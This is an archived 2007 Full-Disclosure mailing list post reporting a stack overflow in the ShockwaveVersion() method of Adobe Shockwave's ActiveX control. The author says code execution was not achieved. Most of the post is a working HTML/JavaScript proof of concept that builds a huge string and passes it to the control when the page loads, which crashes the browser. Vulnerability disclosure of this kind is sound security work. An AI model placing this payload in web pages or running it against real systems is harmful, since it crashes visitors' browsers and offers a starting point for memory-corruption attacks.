Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18386
HistoryNov 12, 2007 - 12:00 a.m.

[Full-disclosure] Adobe Shockwave ShockwaveVersion() Stack Overflow

2007-11-1200:00:00
vulners.com
8

There is a stack overflow in ShockwaveVersion() function. I have not been able to execute code via this overflow. PoC is as follows:

<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 768 * 768) s=s+s;

 var obj = new ActiveXObject&#40;&quot;SWCtl.SWCtl&quot;&#41;; //{233C1507-6A77-46A4-9443-F871F945D258}     

 obj.ShockwaveVersion&#40;s&#41;;
}

</script>

</head>
<body onload="JavaScript: return Check();" />
</html>

Elazar


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/